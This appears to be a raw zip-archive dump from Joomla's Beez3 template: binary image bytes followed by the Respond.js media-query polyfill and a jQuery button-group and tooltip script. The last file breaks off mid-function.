�ZO��d��غ�Ƶ�NIe���'����,2��(	�a�t)��z���)@"��@JȺn�u	�X�)!f��Y;'|F�!	J�0��K�J�
)�bdP�1��6�C>W������{�����FH!��--��:��x
�9��M��1�/�VeB(@�sF�t��)	!�"��t�)e
��6���$�F�yR!KW�iF�X�@r�}A�B1�gJ�T�1�b�C3)��bP�8��u_�RBI���o�l �Jd3�`�B��f'���Aj���t�z��RR��Q�ͨ<�x�h��
[w]�&T��_9jz�R

!�+�v�hd�]'��"��(!��z-4�TDŽ8��l�uT��DÄȞ�o�ߑB0�(�ғ�Z��neg��k�]'�`���~gBd�s\�G��wPt��oGJ��L����˫�����`g���f�bR����>���V���s��[̖m���[�πZ:��۰�ՆK��ʺ��U��鋌�7m��c�	�Y9g��6vڼań���5mt���I3n�}��讣G/�sLYx�ĉ�F��~�̎涹�p�wa����b( њiSǍ�2gl
�n�� ��ˤXd���<�4c?|Ka��uQ���b��	��F�?wzE{{7D,Hر;�?���x��@$x���C��~��)3��z��d�`�M7ՠ�����S���k��n��������:#%E�62v�}�Ϭ.����=w
�jSn����`�_q�m3��j+��ɓ+�(\]I�*7����ɡ�U�<����7O��k��5��qQ�z�>8{r��	K�\e��w�̪�
͵so�8�j��I�&�^?u�}�����G��:sRyg�yy���f��G.&n��G��͛��~�>#}��L��n��0ɳ��̦R����,��u�=� E
!��B#� �+��}��
K� ��/��J�@(H
둘TLH_I_J�K5��)�@!� 4t�X�i���i�T�ŕŶb����9ױ5J�u�8J�p@�L
��I3ha�S�\��6���N%!A���$H(��A��<�8���"�����j�`�|y�PL�q�d6'��'o���)��`J��0�:�|&��{4H	�� �i��K
{�r�A�Ɍ�w��Aj�����Ő̠�����Ĵ�f�-x/���g#y���n���6^����c������ϼq.y��M-���ux�k
Ο�ٝ{^}e���)�|�[G5o�~��i��[>��7�����&�q�k�[�<T�Y}��#��<�zk�/��C��7��o�4�$O��-���/��u���>����.��}��L7�<�Z�Ct�hL)�q�OiQ���Wv��Puem�ߺ���/?sg��C#�G�q%RU�;7�9c��?6C����=�~���YXԛ�>�M�
u{`1��ws+J���]}�_��GB���k}��?��?��τ�*vo��/,��n��s�m���K_�}�'�즱E�_��?����M3��3@aM�z�⦮xj�a#M�HP�q�0��BRy�kxuU�δ���Qs �^�<��$3ib�;�q�!@HcM�2���ymy���!�}����$����Bo�ij�TTk�T�����"���B�h(��q
�F��x�c��Ӣ�DŽD�}!�>�25�29H"uU�OA.u��e0�
I�	T���AP�C��ϳ�
�k� �S�������=GJbŽ�do.�	��5�ṯRRE���`���<d���-�-B����]�e����ǣC�����;~��ƙ�Pvg*5q��CGO6l�r-0q���'_�b��B��B�����K��>ve��]�wm?��/�U�ʡmG[/�����xl6ٵ���Gu��9�n�u��:v���o;��)���b@�l����@r��8~d���O9c���w����3m��O_Y�ȇ*3M��C?ww݉�N�^�H�?��[Zv�.z����l.^����h����Ґ��ylި���{w��H��������bh�j�a晞[ff�}t�/?<fff�ef�����tfJ��W���U�-V聹�ɇN�+_s�U�_zɡ���x�\�3�ە���A�/{^�ͪ�����^����MT�ϛ�#/z�U�]>y����f���1����Y���*�M�pXKm�\*
!�C>FQ�(3��fL{�,,ND��i;s�E�ڬi���hJ�\kv28���D�WU�EhC#_��5��F�$��#O�Z�O�ZmJR%f�&	�A�<�!1U��������.�'&g��J%�—Aȁ>��8�Ȑ/����Dp$�l���E5�7�'�G)��hU��C.��!���eU����!11����Q(C�T�ED���T���C_�>���,"L��ės�.����S`p�|��'��ݓ��+�d�ѻ���?���ջ�>}&�-]��m�i{��S�Υ-��;��{��즥�G/�<|��E�]ۏl���rX��&��w<v"kv�959�@�nwt+ؿ�Ru꾇�<�\:zd�m��=��`ϱ��}Sc�Ὃa�Do�G/�x��=�w�ص4��ԝ�MLw?5�:m���<vxsWgO�R�N�i�F���,�:��w����w?~14��w�^��%|���u՛w]�o���W�q7>_���\���o*K�M�~Y����e��@|l�XXQ2C	ITD��>Ć��͋�n��3c�p�F6�����h��'N���5'��Vv���Q�@ (�rDIѨΤ�b�˲�^��:`�F^h&���j��h �-�P�ڴ1���5;�=֖G�hdT����T�eP�&��c�р㔫B��P�p
c�:g���&@`& I4��A �(E������!DU�a�Q���A����&A+(+ԫ8%#Z1�ĵ4UE�e44t����+�^���QE��oHh���Z��ra%�|�|�D��c��۶n�_ڴmK�H9}���?�[�_w��[.:����/����؋�q�������wm�]��O��}�~��J�juu-�D���?��K�<�;���4�fc)1�<r�����������O�ˇ����O����)�/�N�~�l^����j�罵~�ṳ�!��O�F�������?��{�y�A���>__]ym��ξ�_��Bi�}�����:߹r�G|������j�ә��(�e��dz���eLA#Ll@�5U�(!"IS�n�9���ܷm�L�(��}�ˇ�N�_U>*8�S"E��(I�T�kؖ1�	qee��2k�����7­�q�H�E	�
�݉n��*
��F�)�P’��L��T�/�j�!��:6
(��M�n���Hb�"F��K�L�ꅘ4S�ZCJ&�l�Y��P�@�R#�ɔX�6�K�Fa"���Q[k(H�bР���i�qL�JUQ����B�9??O�H�`���8ܦg��۲1{��oVѹ�F�v\r�X������W�F/t�����_?Yn}ѳo������O��_�~���?����yƋnٿ���q��Z���D\}��d;jܮ�7ky����-�&����6b��o���_�������z��I�?�w�o���~͞�����N���yΖ�	t�tM�icz�U�o{���4N^|s�qp-����q���/:R��B�咃7]Wδu.N�Xx������4����J�5���Ƅ�S�*�2jYƐ�dH0b�XX�U"%D@���zz:I��Wz�'F�j���V����Du�(��U��O�K'�@JV����.���\��*��"��t�,�`��x��?�^ؠm%
P %��>V���(��h��b�DW��䦘caC�D$�(���1S�)��^Y]���N�0��r���ڂ���4RT��E3H���QE"%x�:�3Ɯ�8p�����F�
�A�43	
��Q-C}�H���V��6&�����g��!,�*��BYJ�&�UEI��b�u_$�\�ėi�P��*I�|U����p��*I�b�1��,�
�˨E_5�Ƿ��s� e�i�QUN��G�UII�υ�a>NP�����{܁xۋZ��*����ؓz�O_yM���66��I��A}�u������=y�}O�����������w|>�c���G������` l8�#u�L�
`�'6r@�L�B^����l=��׉u����.����PE����0��ױP��������z�H���0�
�灤٪�h��ևZ��o"��'��f����ί��D��yfii��f&�WU"����v����;?���}nt���ex���ރ�o��1U��„�cccc��ڣ��"ǤQ�䬁��*��� �����v{��Z_^������R��3��f0��*���@`�"�)3F�fb�"@@$"e�@�J��,��#3ú�Hd�*�ĨD���d�IB,}e���W
b@	l@J��YJVG�*QJp$ |2��fL
(S����5�F1d�!*գ��D�3��H�'@��
RU06�{�JA5����"aXCI�P�PU�;==?;k��CD_���>����;��k
�ss_�w>�;)K����e@[y���_���b$�"8T�Rw:�qۑ��n�]���t�����PZ��`!�	B�IrnI�:�]���$����>��� ����ԫ�Q�0�Ed55��g�����t�l�A�f���wd��AA< � ���� ��#� 
0� � (�� �� � 
0�|�|�nam}]Q~ack��|�������^ȳ,���0��zf|xj	��c��[=�㹌�)�zs���ϣ�Z1�O��ϗ�ϗ�Z�9lU>=�n�����l~�ǩ[��RnÏdWL�֍n��\����Y+��qT:�2���;���m�)���!�<��qL�il�B�����-���5�p���cl)��6�

0�r�P�����
���^x�x���_F=���!�[�~�"U�_��4�>��������Ma/
��c��pd~0�jn����^()��/P���F���~d|7�E#�O1�\߯t�H8x�(��[���qQA��|�q�I~�C�Hڊ�V�\D�|ɽ���̧���4�+-�5��Էh�Bg���������;Ƶ��-
]�6���"�
s�-����z[�+,? (��K���G������[y���Y�_��vՖ7�
�/|}�l�
I;�s���^�_�u�������7������^�r�����@˅o���<�_}��P
�ܻ���7G�V':�/^���n��Q�s���2i���__�1�l���΋���W��.-�p���E�6k,n�cn(�����zf5���l�������sW
�m�m�n_�����e�Z{�k�ۘm�����p����b󘾾T�Os���n��_�v�e�7�<߫\��lV��X�w��k�����;�]��>������w��7��

��~ ��?���x\��.��*��~��uٖ<�m5%�o�)m�i��_�^6�"ƒ�|�i���~���	�H�@����s��R�����~��Żr��kew����e#<G 4���w�uh*��;w�ƻf=Oj�}���s6+
e�7o~��q���Rr���/�y�A�s��?��sҥ�!/
�~���4X���&��3�;��p�na�riaR���Ε//ޝ������_�+l��V��o��d>{�m�|��K7�[<�u�?h�S`𗴍w/��x����LV���
�v�>"�-̏wT~��k;xy�������^o��7�̏��}�խY�Ǻ8�90`�m�X6{�˼2|�o~�ե's��k�ʢW���������఩�ۛ�o_��Z����Í��t^n��O\�_����XOɭ���\1�Xx5�j�Dӭ���NU�
/����W
�n�-����4��;;�����bmCv����#J���˥W�}{�rY�~X߼�g��#/Ö�n�:�����ωf,
6
���/�b��7�U8`�� ���)437g]խח���Q�����	w2��a}�����uU�."&���W>l�Z���l-�zh��$���K����'����Q/6*j�����%!,�qA��Q�
�-�Ҿə�ޢGc���(��&<�Z�+o��-(m�Z�����K��>�@��)�1�a�L��=���4�����Ā@$X�&7��ᆺa
%sO���?XY30;�\QiJ
5OT7�7>��'��5�f��6�
3��]-OfbRS�~���#�S��*�;�j��a�HO�t��)�*�Z��5Tv��H�[�W}��Ֆ��V2�LrnljC�vE:��+�<��J�+�t��uOS˜zCk�gq4�M����v�0H��s8�����q��º��&=')�!+��R7��P�����%���eM�q���j�v��*
&1i�`��Y�~4����p����Ƙ=�L�MgZh�}<4!-��N��l�W�u�?j�Z�GF���#�Cu#[q���^��XˣQ�nI
�i����aD��Į��u3{���>V�`����ހ!Lb*+������j�Z�YVƛ�j�W|R$��W�M/��w�qØ�=��ɾ���5fF,���jdb��O`�ll]4��K���JIcZ
?���H�i�,��/��F�r������/I��'�kc���zOR*�6k�U�"327;J�'7'�[��������V�$]�`8�W6#"���z�&��	
�I����n�Gfd�FZ{�G��n���r���k~;*�;�ͅ�!NL[�m�b
S��D�����v7��k�v�4�ڒreR1�w�J/�Ĕ���3ᅮ�'N���8�ݞ��
g��WN����tn|R����ZY��>D��s��W��!��2�	"�^T_<�w�3��3�����ώ'�3nuߩ���p��T����v0�3<0A��<�#08�Olb���ܴ�AK�}�}�Y9����s�A4cF�����I~l�
;\N'�7$����p�#��0�i&ð��c{�Ыod���Lp╼�'���\�e\Qo���x���E�'����-�O!S`M���w��z/����xR���;�s�+�I�ޓ��i�pQα�Of�X�46��I�8��k`�1�a1�����8m�8����kx��v��L�~H6�`��9310���cyg���x��ԂҀ�$X�Y���lZ~>$��73�Ю�GD���;��S����qZ��[XZ���V��hTr@���/K;�\D�_+$dsdRM�<�?�SL����z�Ὡ<L�ZZ���ٲY8���.y`���f�F8
f���
�M��s�������$�\
;LC�ڤ�����>a$�9#���#xTR�	�I�T�u,�Y�C��zz�U���x�:��_=Ŷ���� _�C��'��V���h�s�u�ht��/<��O|HLzޙ�9I�$��&��T���9��ms��J�沛� c.W`رw����sݫZb����p#R���p�f����%��R��4��3G�������t����#��ï�1a�vQE����f��z%F$J`S�#/�Ӡ7:1�e3��[�M���
��C�#	�d�A����W{�}-uC�0�k���`����2�d2��e0;��#};.4�ʍL�O���f�ժ�2Z�1�nrl�h����d��mΧ'�]�՘�N��`{ifd�h���얧�5۷��6�ͤU��������K,�L���[l�Fg�6k7���{w���K�$��Re�n;��.�Jrm.�����?�Vt�~6}�в1o�<��ѧ�?�0����wNK�&=.�c2Z�n���d���m�˻������3�S��?��^Q�|�c����e�2j�ǹ��:�ýj�����;���t&�æ�Z�N��6�W���`�iM��`�˱m5�`˄uc��pF��\Z�iˠR1�Q�+�Jj1x��QNw����ow���
���E��|y���P�PG'ص�U�ety���#k��hPn�9aa�q1���$�iQK�9��l�n�XtYL�H�ueL���?d�R=6����l�562;������ڐ
)R٤Ӈ;0�vn`p�`WM)����΂4A����z���@�t��I¾�Z%1uo��!DŽ�Œx&e�!�LEł_zB,��&��H7p�8!ayzjfvZ���!�a���˯����@�Z�f��m6+��No�3��ds8��@��Y�=�-
�͏���J�]�����x�$1"8o�N�6�'�v�9�?bҹ�w[[F�/�cc�o���Ҝ+�ʁ�e�@@���'c�SZ���ܶ�-�?7�>�22�4l��a�
= (��K��N�LfIi�T����v�#�E��C
�?�H��JF۽�m�,��W�9��.j\��<y$!"8�Gr�H��+�wcD���o���v�/h9tf�P�!��b��\�Ě��D��ȸ�`?�/?&Y^����X�L��'����(~h�P�K����Y�
�I�04(T��I�	�A4����)�9�o�H�Z��2�O�t̄gf'�r�q���8A� cz��S�(������O����p�#�
[�N�8H��xi�B2xC�}砬,�y�HnlDx�8�'���c	�sE�G���,+ʁ�rs
��rϾ$H"��L������,��1E�3b]���
KI��I|X�d_V���{;,-;-�B�ƺ�夘��?��g�99�6���K�����>��˺d�?�x���a�Gm���G�%
C����:v�O��{��F�I�S3r��q�<2��>��lU�щ׎��C�x�􃟽����uF�a�ر�X6	��
N�j:[��3⡲��o��k["��$�AJߛh��b�9��ߺ|����a1�هN|��%0��:���#�xL��N��Ѯ�Vj^n,��>q��97��3�p<��7ގ�I�W�f彚��@c���;n�Hx����Su+�ݙ��(a4����@/r|�8��(���I�"����W�q��I�io�ux��iJ�`��d��Xk~������Z�[5�00�d�@TJr,�^�}�L�Ԣ5��wv7ݻ��M:���PV�joɰ��)L��
�X���w_#�kJlG_=%�D���� ?�Ҿ ?����j:x11S[h����/~
����MJ4~�UA��?��?����^qϡ��sN
�)��������@�_�r�---4����� �ˍ�wt��9}�W��WHt�G�<Ao|�?ȣR,�g���Fj�)��? ȯA�B��};�(��|���{1�X���އR��l@�3`AAFAy�fcuC?�ys]���_�^]T��wp�7H�7AAF��ه�*:᧐�ݯꁿ�����K�=����u������Z���A�O0���K�x�?~ᥫ�s&xjq��o.
,`^�[SZ\��{�l��cQ�Yn����W��n�{'79jK���w
�2��v��~���&�h-�v�A[Oc��nv��F��~կZ_��WMn���\��7����ͪS�s�ed�[�Ŋ�+wJ��7 ������?x.ef���[�&n4,,����nߛ�RW]�>�"'���}Bū�jT�bTCΐ�P�[�<ɮx��w�#�d{6�3j<���\.���Y%3��[u����5�=a���cF�0>�O��*)Zw�z[{�&��
*$[YQsDb����oq����%Ol$�2._A�����H$�!8/@�	��˟@�`�Em�럼��؊�k��v�w�I廖�Ó2�~���	�Yo~�i4;������}�al|�J����,�L[��ˣx�'f�I���zG�U��y7-+�<$�;(�Ш��Yal�@��'ҙ6����}�iB$]�54�R�+fՄ�C	*ٌ	� /��iv�D���4�DT)���IEND�B`�PK!j��	%	%beez3/javascript/respond.src.jsnu&1i�/*! matchMedia() polyfill - Test a CSS media type/query in JS. Authors & copyright (c) 2012: Scott Jehl, Paul Irish, Nicholas Zakas. Dual MIT/BSD license */
/*! NOTE: If you're already including a window.matchMedia polyfill via Modernizr or otherwise, you don't need this part */
window.matchMedia = window.matchMedia || (function(doc, undefined){

  var bool,
      docElem  = doc.documentElement,
      refNode  = docElem.firstElementChild || docElem.firstChild,
      // fakeBody required for <FF4 when executed in <head>
      fakeBody = doc.createElement('body'),
      div      = doc.createElement('div');

  div.id = 'mq-test-1';
  div.style.cssText = "position:absolute;top:-100em";
  fakeBody.style.background = "none";
  fakeBody.appendChild(div);

  return function(q){

    div.innerHTML = '&shy;<style media="'+q+'"> #mq-test-1 { width: 42px; }</style>';

    docElem.insertBefore(fakeBody, refNode);
    bool = div.offsetWidth == 42;
    docElem.removeChild(fakeBody);

    return { matches: bool, media: q };
  };

})(document);




/*! Respond.js v1.1.0: min/max-width media query polyfill. (c) Scott Jehl. MIT/GPLv2 Lic. j.mp/respondjs  */
(function( win ){
	// Exposed namespace
	win.respond = {};

	// Define update even in native-mq-supporting browsers, to avoid errors
	respond.update = function(){};

	// Expose media query support flag for external use
	respond.mediaQueriesSupported = win.matchMedia && win.matchMedia( "only all" ).matches;

	// If media queries are supported, exit here
	if ( respond.mediaQueriesSupported ){ return; }

	// Define vars
	var doc            = win.document,
		docElem        = doc.documentElement,
		mediastyles    = [],
		rules          = [],
		appendedEls    = [],
		parsedSheets   = {},
		resizeThrottle = 30,
		head           = doc.getElementsByTagName( "head" )[0] || docElem,
		base           = doc.getElementsByTagName( "base" )[0],
		links          = head.getElementsByTagName( "link" ),
		requestQueue   = [],

		// Loop stylesheets, send text content to translate
		ripCSS = function(){

			var sheets = links,
				sl     = sheets.length,
				i      = 0,
				// Vars for loop:
				sheet, href, media, isCSS;

			for( ; i < sl; i++ ){
				sheet = sheets[ i ],
				href  = sheet.href,
				media = sheet.media,
				isCSS = sheet.rel && sheet.rel.toLowerCase() === "stylesheet";

				//only links plz and prevent re-parsing
				if ( !!href && isCSS && !parsedSheets[ href ] ){
					// selectivizr exposes css through the rawCssText expando
					if (sheet.styleSheet && sheet.styleSheet.rawCssText) {
						translate( sheet.styleSheet.rawCssText, href, media );
						parsedSheets[ href ] = true;
					} else {

						if ( (!/^([a-zA-Z:]*\/\/)/.test( href ) && !base)
							|| href.replace( RegExp.$1, "" ).split( "/" )[0] === win.location.host ){
							requestQueue.push( {
								href: href,
								media: media
							} );
						}
					}
				}
			}
			makeRequests();
		},

		// Recurse through request queue, get css text
		makeRequests = function(){

			if ( requestQueue.length ){
				var thisRequest = requestQueue.shift();

				ajax( thisRequest.href, function( styles ){

					translate( styles, thisRequest.href, thisRequest.media );
					parsedSheets[ thisRequest.href ] = true;
					makeRequests();
				} );
			}
		},

		// Find media blocks in css text, convert to style blocks
		translate       = function( styles, href, media ){
			var qs      = styles.match(  /@media[^\{]+\{([^\{\}]*\{[^\}\{]*\})+/gi ),
				ql      = qs && qs.length || 0,
				// Try to get CSS path
				href    = href.substring( 0, href.lastIndexOf( "/" )),
				repUrls = function( css ){
					return css.replace( /(url\()['"]?([^\/\)'"][^:\)'"]+)['"]?(\))/g, "$1" + href + "$2$3" );
				},
				useMedia = !ql && media,
				// Vars used in loop
				i        = 0,
				j, fullq, thisq, eachq, eql;

			// If path exists, tack on trailing slash
			if ( href.length ){ href += "/"; }

			//if no internal queries exist, but media attr does, use that
			//note: this currently lacks support for situations where a media attr is specified on a link AND
				//its associated stylesheet has internal CSS media queries.
				//In those cases, the media attribute will currently be ignored.
			if ( useMedia ){
				ql = 1;
			}

			for( ; i < ql; i++ ){
				j = 0;

				// Media attr
				if ( useMedia ){
					fullq = media;
					rules.push( repUrls( styles ) );
				}
				// Parse for styles
				else{
					fullq = qs[ i ].match( /@media *([^\{]+)\{([\S\s]+?)$/ ) && RegExp.$1;
					rules.push( RegExp.$2 && repUrls( RegExp.$2 ) );
				}

				eachq = fullq.split( "," );
				eql   = eachq.length;

				for( ; j < eql; j++ ){
					thisq = eachq[ j ];
					mediastyles.push( {
						media    : thisq.split( "(" )[ 0 ].match( /(only\s+)?([a-zA-Z]+)\s?/ ) && RegExp.$2 || "all",
						rules    : rules.length - 1,
						hasquery : thisq.indexOf("(") > -1,
						minw     : thisq.match( /\(min\-width:[\s]*([\s]*[0-9\.]+)(px|em)[\s]*\)/ ) && parseFloat( RegExp.$1 ) + ( RegExp.$2 || "" ),
						maxw     : thisq.match( /\(max\-width:[\s]*([\s]*[0-9\.]+)(px|em)[\s]*\)/ ) && parseFloat( RegExp.$1 ) + ( RegExp.$2 || "" )
					} );
				}
			}

			applyMedia();
		},

		lastCall,

		resizeDefer,

		// returns the value of 1em in pixels
		getEmValue = function() {
			var ret,
				div      = doc.createElement('div'),
				body     = doc.body,
				fakeUsed = false;

			div.style.cssText = "position:absolute;font-size:1em;width:1em";

			if ( !body ){
				body = fakeUsed = doc.createElement( "body" );
				body.style.background = "none";
			}

			body.appendChild( div );

			docElem.insertBefore( body, docElem.firstChild );

			ret = div.offsetWidth;

			if ( fakeUsed ){
				docElem.removeChild( body );
			}
			else {
				body.removeChild( div );
			}

			// Also update eminpx before returning
			ret = eminpx = parseFloat(ret);

			return ret;
		},

		// Cached container for 1em value, populated the first time it's needed
		eminpx,

		// Enable/disable styles
		applyMedia          = function( fromResize ){
			var name        = "clientWidth",
				docElemProp = docElem[ name ],
				currWidth   = doc.compatMode === "CSS1Compat" && docElemProp || doc.body[ name ] || docElemProp,
				styleBlocks = {},
				lastLink    = links[ links.length-1 ],
				now         = (new Date()).getTime();

			// Throttle resize calls
			if ( fromResize && lastCall && now - lastCall < resizeThrottle ){
				clearTimeout( resizeDefer );
				resizeDefer = setTimeout( applyMedia, resizeThrottle );
				return;
			}
			else {
				lastCall = now;
			}

			for( var i in mediastyles ){
				var thisstyle = mediastyles[ i ],
					min = thisstyle.minw,
					max = thisstyle.maxw,
					minnull = min === null,
					maxnull = max === null,
					em = "em";

				if ( !!min ){
					min = parseFloat( min ) * ( min.indexOf( em ) > -1 ? ( eminpx || getEmValue() ) : 1 );
				}
				if ( !!max ){
					max = parseFloat( max ) * ( max.indexOf( em ) > -1 ? ( eminpx || getEmValue() ) : 1 );
				}

				// If there's no media query at all (the () part), or min or max is not null, and if either is present, they're true
				if ( !thisstyle.hasquery || ( !minnull || !maxnull ) && ( minnull || currWidth >= min ) && ( maxnull || currWidth <= max ) ){
						if ( !styleBlocks[ thisstyle.media ] ){
							styleBlocks[ thisstyle.media ] = [];
						}
						styleBlocks[ thisstyle.media ].push( rules[ thisstyle.rules ] );
				}
			}

			// Remove any existing respond style element(s)
			for( var i in appendedEls ){
				if ( appendedEls[ i ] && appendedEls[ i ].parentNode === head ){
					head.removeChild( appendedEls[ i ] );
				}
			}

			// Inject active styles, grouped by media type
			for( var i in styleBlocks ){
				var ss  = doc.createElement( "style" ),
					css = styleBlocks[ i ].join( "\n" );

				ss.type  = "text/css";
				ss.media = i;

				// Originally, ss was appended to a documentFragment and sheets were appended in bulk.
				// This caused crashes in IE in a number of circumstances, such as when the HTML element had a bg image set, so appending beforehand seems best. Thanks to @dvelyk for the initial research on this one!
				head.insertBefore( ss, lastLink.nextSibling );

				if ( ss.styleSheet ){
					ss.styleSheet.cssText = css;
				}
				else{
					ss.appendChild( doc.createTextNode( css ) );
		        }

				// Push to appendedEls to track for later removal
				appendedEls.push( ss );
			}
		},
		// Tweaked Ajax functions from Quirksmode
		ajax = function( url, callback ) {
			var req = xmlHttp();
			if (!req){
				return;
			}
			req.open( "GET", url, true );
			req.onreadystatechange = function () {
				if ( req.readyState != 4 || req.status != 200 && req.status != 304 ){
					return;
				}
				callback( req.responseText );
			}
			if ( req.readyState == 4 ){
				return;
			}
			req.send( null );
		},
		// Define ajax obj
		xmlHttp = (function() {
			var xmlhttpmethod = false;
			try {
				xmlhttpmethod = new XMLHttpRequest();
			}
			catch( e ){
				xmlhttpmethod = new ActiveXObject( "Microsoft.XMLHTTP" );
			}
			return function(){
				return xmlhttpmethod;
			};
		})();

	// Translate CSS
	ripCSS();

	// Expose update for re-running respond later on
	respond.update = ripCSS;

	// Adjust on resize
	function callMedia(){
		applyMedia( true );
	}
	if ( win.addEventListener ){
		win.addEventListener( "resize", callMedia, false );
	}
	else if( win.attachEvent ){
		win.attachEvent( "onresize", callMedia );
	}
})(this);
PK!˭���beez3/javascript/template.jsnu&1i�/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 * @since       3.2
 */

jQuery(function($) {
	'use strict';

	$(document).on('click', ".btn-group label:not(.active)", function() {
			var $label = $(this);
			var $input = $(document.getElementById($label.attr('for')));

			if ($input.prop('checked'))
			{
				return;
			}

			$label.closest('.btn-group').find("label").removeClass('active btn-success btn-danger btn-primary');

			var btnClass = 'primary';

			if ($input.val() != '')
			{
				var reversed = $label.closest('.btn-group').hasClass('btn-group-reversed');
				btnClass = ($input.val() == 0 ? !reversed : reversed) ? 'danger' : 'success';
			}

			$label.addClass('active btn-' + btnClass);
			$input.prop('checked', true).trigger('change');
		})
		.on('subform-row-add', initButtonGroup)
		.on('subform-row-add', initTooltip);

	initButtonGroup();
	initTooltip();

	// Called once on domready, again when a subform row is added
	function initTooltip(event, container)
	{
		$(container || document).find('*[rel=tooltip]').tooltip();
	}

	// Called once on domready, again when a subform row is added
	function initButtonGroup(event, container)
	{
		var $container = $(container || document);

		// Turn radios into btn-group
		$container.find('.radio.btn-group label').addClass('btn');

		// Setup coloring for buttons
		$container.find('.btn-group input:checked').each(function() {
			var $input  = $(this);
			var $label = $(document.querySelector('label[for=' + $input.attr('id') + ']'));
			var btnClass = 'primary';

			if ($input.val() != '')
			{
				var reversed = $input.parent().hasClass('btn-group-reversed');
				btnClass = ($input.val() == 0 ? !reversed : reversed) ? 'danger' : 'success';
			}

			$label.addClass('active btn-' + btnClass);
		});
	}
});
PK!��t%%beez3/javascript/respond.jsnu&1i�/*! matchMedia() polyfill - Test a CSS media type/query in JS. Authors & copyright (c) 2012: Scott Jehl, Paul Irish, Nicholas Zakas. Dual MIT/BSD license */
/*! NOTE: If you're already including a window.matchMedia polyfill via Modernizr or otherwise, you don't need this part */
window.matchMedia = window.matchMedia || (function(doc, undefined){

  var bool,
      docElem  = doc.documentElement,
      refNode  = docElem.firstElementChild || docElem.firstChild,
      // fakeBody required for <FF4 when executed in <head>
      fakeBody = doc.createElement('body'),
      div      = doc.createElement('div');

  div.id = 'mq-test-1';
  div.style.cssText = "position:absolute;top:-100em";
  fakeBody.style.background = "none";
  fakeBody.appendChild(div);

  return function(q){

    div.innerHTML = '&shy;<style media="'+q+'"> #mq-test-1 { width: 42px; }</style>';

    docElem.insertBefore(fakeBody, refNode);
    bool = div.offsetWidth == 42;
    docElem.removeChild(fakeBody);

    return { matches: bool, media: q };
  };

})(document);




/*! Respond.js v1.1.0: min/max-width media query polyfill. (c) Scott Jehl. MIT/GPLv2 Lic. j.mp/respondjs  */
(function( win ){
	//exposed namespace
	win.respond = {};

	//define update even in native-mq-supporting browsers, to avoid errors
	respond.update = function(){};

	//expose media query support flag for external use
	respond.mediaQueriesSupported = win.matchMedia && win.matchMedia( "only all" ).matches;

	//if media queries are supported, exit here
	if ( respond.mediaQueriesSupported ){ return; }

	//define vars
	var doc            = win.document,
		docElem        = doc.documentElement,
		mediastyles    = [],
		rules          = [],
		appendedEls    = [],
		parsedSheets   = {},
		resizeThrottle = 30,
		head           = doc.getElementsByTagName( "head" )[0] || docElem,
		base           = doc.getElementsByTagName( "base" )[0],
		links          = head.getElementsByTagName( "link" ),
		requestQueue   = [],

		// Loop stylesheets, send text content to translate
		ripCSS         = function(){
			var sheets = links,
				sl     = sheets.length,
				i      = 0,
				// Vars for loop:
				sheet, href, media, isCSS;

			for( ; i < sl; i++ ){
				sheet = sheets[ i ],
				href  = sheet.href,
				media = sheet.media,
				isCSS = sheet.rel && sheet.rel.toLowerCase() === "stylesheet";

				// Only links plz and prevent re-parsing
				if ( !!href && isCSS && !parsedSheets[ href ] ){
					// Selectivizr exposes css through the rawCssText expando
					if (sheet.styleSheet && sheet.styleSheet.rawCssText) {
						translate( sheet.styleSheet.rawCssText, href, media );
						parsedSheets[ href ] = true;
					} else {
						if ( (!/^([a-zA-Z:]*\/\/)/.test( href ) && !base)
							|| href.replace( RegExp.$1, "" ).split( "/" )[0] === win.location.host ){
							requestQueue.push( {
								href: href,
								media: media
							} );
						}
					}
				}
			}
			makeRequests();
		},

		// Recurse through request queue, get css text
		makeRequests = function(){
			if ( requestQueue.length ){
				var thisRequest = requestQueue.shift();

				ajax( thisRequest.href, function( styles ){
					translate( styles, thisRequest.href, thisRequest.media );
					parsedSheets[ thisRequest.href ] = true;
					makeRequests();
				} );
			}
		},

		// Find media blocks in css text, convert to style blocks
		translate       = function( styles, href, media ){
			var qs      = styles.match(  /@media[^\{]+\{([^\{\}]*\{[^\}\{]*\})+/gi ),
				ql      = qs && qs.length || 0,
				// Try to get CSS path
				href    = href.substring( 0, href.lastIndexOf( "/" )),
				repUrls = function( css ){
					return css.replace( /(url\()['"]?([^\/\)'"][^:\)'"]+)['"]?(\))/g, "$1" + href + "$2$3" );
				},
				useMedia = !ql && media,
				// Vars used in loop
				i        = 0,
				j, fullq, thisq, eachq, eql;

			// If path exists, tack on trailing slash
			if ( href.length ){ href += "/"; }

			/* If no internal queries exist, but media attr does, use that
			*  note: this currently lacks support for situations where a media attr is specified on a link AND
			*  its associated stylesheet has internal CSS media queries.
			*  In those cases, the media attribute will currently be ignored.
			*/
			if ( useMedia ){
				ql = 1;
			}


			for( ; i < ql; i++ ){
				j = 0;

				// Media attr
				if ( useMedia ){
					fullq = media;
					rules.push( repUrls( styles ) );
				}
				// Parse for styles
				else{
					fullq = qs[ i ].match( /@media *([^\{]+)\{([\S\s]+?)$/ ) && RegExp.$1;
					rules.push( RegExp.$2 && repUrls( RegExp.$2 ) );
				}

				eachq = fullq.split( "," );
				eql   = eachq.length;

				for( ; j < eql; j++ ){
					thisq = eachq[ j ];
					mediastyles.push( {
						media    : thisq.split( "(" )[ 0 ].match( /(only\s+)?([a-zA-Z]+)\s?/ ) && RegExp.$2 || "all",
						rules    : rules.length - 1,
						hasquery : thisq.indexOf("(") > -1,
						minw     : thisq.match( /\(min\-width:[\s]*([\s]*[0-9\.]+)(px|em)[\s]*\)/ ) && parseFloat( RegExp.$1 ) + ( RegExp.$2 || "" ),
						maxw     : thisq.match( /\(max\-width:[\s]*([\s]*[0-9\.]+)(px|em)[\s]*\)/ ) && parseFloat( RegExp.$1 ) + ( RegExp.$2 || "" )
					} );
				}
			}

			applyMedia();
		},

		lastCall,

		resizeDefer,

		// Returns the value of 1em in pixels
		getEmValue = function() {
			var ret,
				div  = doc.createElement('div'),
				body = doc.body,
				fakeUsed = false;

			div.style.cssText = "position:absolute;font-size:1em;width:1em";

			if ( !body ){
				body = fakeUsed = doc.createElement( "body" );
				body.style.background = "none";
			}

			body.appendChild( div );

			docElem.insertBefore( body, docElem.firstChild );

			ret = div.offsetWidth;

			if ( fakeUsed ){
				docElem.removeChild( body );
			}
			else {
				body.removeChild( div );
			}

			// Also update eminpx before returning
			ret = eminpx = parseFloat(ret);

			return ret;
